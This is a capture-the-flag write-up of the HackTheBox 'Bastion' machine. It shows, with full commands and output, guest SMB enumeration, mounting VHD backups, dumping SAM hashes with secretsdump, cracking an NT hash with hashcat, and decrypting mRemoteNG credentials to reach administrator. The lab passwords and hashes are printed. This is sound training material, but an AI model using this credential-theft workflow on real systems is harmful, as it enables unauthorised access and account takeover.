HackTheBox: Bastion
windows smb vhd cifs secretsdumpBastion is a Windows-based machine authored by L4mpje, with an average rating of 4.6 stars.
// Lessons Learned
- While SMB commandline tools are great for quickly gaining access to a share, mounting them via CIFS can be better for larger shares, since it allows you to leverage graphical file explorers for browsing
- Secretsdump is written about mostly in remote attack contexts, but is just as useful if you can download the relevant file(s) to your local machine
// Recon
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ nmap -A -p- bastion.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-13 11:40 AEST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.036s latency).
Not shown: 65507 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8378/tcp filtered cruise-config
10719/tcp filtered unknown
12140/tcp filtered unknown
12593/tcp filtered unknown
13777/tcp filtered unknown
14954/tcp filtered unknown
27436/tcp filtered unknown
36387/tcp filtered unknown
37394/tcp filtered unknown
42732/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
48254/tcp filtered unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
50841/tcp filtered unknown
57068/tcp filtered unknown
58286/tcp filtered unknown
65105/tcp filtered unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -38m17s, deviation: 1h09m14s, median: 1m40s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-05-13T02:22:58
|_ start_date: 2022-05-13T01:30:14
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-05-13T04:22:57+02:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2459.22 seconds
Nmap reveals this machine is running:
- ssh on port
22 - rpc on port
135 - SMB-related services (NetBIOS on
139and Microsoft-DS on445) - WinRM over http on port
5985
We’re able to quickly establish that anonymous rpc connections are not permitted:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ rpcclient -U "" -N bastion.htb
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
But it looks like we can access the SMB service with a guest logon:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ crackmapexec smb bastion.htb -u 'guest' -p ''
SMB bastion.htb 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB bastion.htb 445 BASTION [+] Bastion\guest:
Swapping to smbmap, we’re able to confirm there is a Backups share that we can read & write to without authentication:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ smbmap -u 'guest' -p '' -H bastion.htb
[+] IP: bastion.htb:445 Name: unknown
[|] Work[!] Unable to remove test directory at \\bastion.htb\Backups\TNFZGLRQUV, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Once connected, there are a lot of metadata & XML files within the share, which likely don’t contain much useful info. Aside from these, we’re only able to download a few usable, non-empty files:
note.txtthat includes the text “Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.”- two virtual hard disk (
.vhd) backups files, one 37mb in size and the other 5.4gb (presumably the file referenced innote.txt)
// Initial Foothold
While we could go ahead and download these files, that would take a a long time (not to mention go against the wishes of the target’s admin =P). Instead, we can access these files from our attack kali machine as mounted remote shares using a couple of helpful utilities, libguestfs-tools and cifs-utils. First we mount the Backups share using the SMB-compatible cifs (Common Internet File System) protocol:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ mkdir Backups && sudo mount -t cifs -o username=guest //bastion.htb/Backups ./Backups
Password for guest@//bastion.htb/Backups: <no password, hit enter here>
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ ls -l Backups
total 1
-r-xr-xr-x 1 root root 116 Apr 16 2019 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
drwxr-xr-x 2 root root 0 May 16 08:21 TNFZGLRQUV
drwxr-xr-x 2 root root 0 Feb 22 2019 WindowsImageBackup
We can then mount each .vhd file using guestmount (tab completion gets very laggy here, and the command can take several minutes to complete):
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ mkdir backup1 && guestmount --add Backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro backup1 -v
libguestfs: creating COW overlay to protect original drive content
libguestfs: command: run: qemu-img --help | grep -sqE -- '\binfo\b.*-U\b'
libguestfs: command: run: qemu-img
...
──(kali㉿kali)-[~/HTB/bastion]
└─$ mkdir backup2 && guestmount --add Backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro backup2 -v
libguestfs: creating COW overlay to protect original drive content
libguestfs: command: run: qemu-img --help | grep -sqE -- '\binfo\b.*-U\b'
libguestfs: command: run: qemu-img
...
Both of the backups contain the Windows\System32\config directory. Two of the more interesting files from a security perspective, SAM (Security Account Manager, the registry hive that stores credentials for local users) and SYSTEM (the system hive, home to the SysKey that is required to decrypt the SAM hive), appear with the same filesize in both backups, meaning they are likely identical . We can copy these two files to a local folder for faster access, and then put secretsdump to work:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
Secretsdump is a poweful tool that can dump hashes (secrets) from various sources - the SAM registry hive, LSA (Local Security Authority), Kerberos etc - under remote or local conditions. In this situation, we’ve instructed it to crack the SAM hive to retrieve local user hashes, using the SYSTEM hive’s SysKey to decrypt the SAM itself. The only valuable hash revealed here is the NT (‘New Technology’) hash 26112010952d963c8dc4217daec986d9 for the L4mpje user. The NT hash for the Administrator and Guest users, 31d6cfe0d16ae931b73c59d7e0c089c0, decrypts to an empty password, indicating it isn’t crackable by secretsdump. Similarly, the LM (Lan Manager, an older and much less secure form of encryption) hash for all users, aad3b435b51404eeaad3b435b51404ee, decrypts as an empty string, indicates LM authentication is disabled. Hashcat can quickly handle the decryptable NT hash using the ubiquitous rockyou.txt wordlist:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ hashcat --force -m 1000 -a 0 l4mpje.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz, 1428/2921 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
26112010952d963c8dc4217daec986d9:bureaulampje
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 26112010952d963c8dc4217daec986d9
Time.Started.....: Mon May 16 10:57:47 2022, (5 secs)
Time.Estimated...: Mon May 16 10:57:52 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2261.1 kH/s (0.06ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 9396224/14344385 (65.50%)
Rejected.........: 0/9396224 (0.00%)
Restore.Point....: 9395200/14344385 (65.50%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: burgers11 -> burbank105
Hardware.Mon.#1..: Util: 28%
Testing these credentials against the various services, we’re now able to access ssh using L4mpje / bureaulampje, and can retrieve the user flag from the usual location:
┌──(kali㉿kali)-[~]
└─$ ssh L4mpje@bastion.htb
The authenticity of host 'bastion.htb (10.10.10.134)' can't be established.
ED25519 key fingerprint is SHA256:2ZbIDKRPlngECX1WSMqnucdOWthIaPG7wQ6mBReac7M.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bastion.htb' (ED25519) to the list of known hosts.
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\Desktop
22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
16-05-2022 00:07 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 11.316.256.768 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
3e1e8***************************
// Privilege Escalation
Exploring the user’s home directory doesn’t reveal much interesting in the way of privilege escalation. There is a startup batch script at C:\Users\L4mpje\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L4mpje-script.bat, which seems intended to mount a \Backups share (possibly the same one we looked at earlier) as the Z: drive on the local machine:
NET USE Z: "\\192.168.1.74\Backups" /user:L4mpje bureaulampje
The IP address used here, 192.168.1.74 is not part of this machine (confirmed by running ipconfig) so the share is either remote, or this script is out of date. Trying to run it returns a timeout error:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>.\L4mpje-script.bat
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>NET USE Z: "\\192.168.1.74\Backups" /user:L4mpje bureaulampje
System error 53 has occurred.
The network path was not found.
If we modify the script to use the current IP of the target, we’re able to make it work:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>.\L4mpje-script.bat
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>NET USE Z: "\\10.10.10.134\Backups" /user:L4mpje bureaulampje
Z: has a remembered connection to \\192.168.1.74\Backups. Do you want to overwrite the remembered connection? (Y/N) [Y]: y
The command completed successfully.
But this only provides access to the same share we had as the guest user. We can further modify the script, to try and mount some privileged shares, e.g:
NET USE Z: "\\10.10.10.134\ADMIN$" /user:L4mpje bureaulampje
But this fails to run with a permission error, indicating the script is not running with any kind of special privileges.
Looking further around the filesystem, there is an interesting application folder kept at C:\Program Files (x86)\mRemoteNG. Some research indicates this represents the mRemoteNG, a “multi-remote next generation connection manager” that supports RDP, VNC, SSH and several other remote administration protocols. Applications like this typically store their configuration (including credentials for the remote machines being administered) in either a local file or database. ‘Bastion’ in network terminology refers to a host that is used to provide access, or ‘pivot’ to other hosts, that are otherwise publicly unavailable, so this seems like a likely privesc vector. Some further research reveals an interesting blog post indicating that the app uses XML files to store data, and the encryption of sensitive values in these files is relatively weak. A ready-made decryption script is also available, to run against the app’s main confCons.xml file. Searching the file system reveals the path needed:
l4mpje@BASTION C:\>dir /s /p confCons.xml
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 15:03 6.316 confCons.xml
1 File(s) 6.316 bytes
Total Files Listed:
1 File(s) 6.316 bytes
0 Dir(s) 11.315.286.016 bytes free
Within the C:\Users\L4mpje\AppData\Roaming\mRemoteNG folder, there are additionally multiple backup copies of this file, meaning that we may need to attempt decryption multiple times to find something useful:
22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 15:03 6.316 confCons.xml
22-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 15:03 51 extApps.xml
22-02-2019 15:03 5.217 mRemoteNG.log
22-02-2019 15:03 2.245 pnlLayout.xml
22-02-2019 15:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 11.315.286.016 bytes free
Fortunately we only have to download and test the current active file, confCons.xml, to reveal a set of working administrator credentials:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ python ./mremoteng_decrypt.py ./confCons.xml
Name: DC
Hostname: 127.0.0.1
Username: Administrator
Password: thXLHM96BeKL0ER2
Name: L4mpje-PC
Hostname: 192.168.1.75
Username: L4mpje
Password: bureaulampje
With the new details, we can ssh (or WinRM) into the machine as the administrator, and access the root key in the usual location:
┌──(kali㉿kali)-[~/HTB/bastion]
└─$ ssh administrator@bastion.htb
administrator@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
20d4a***************************
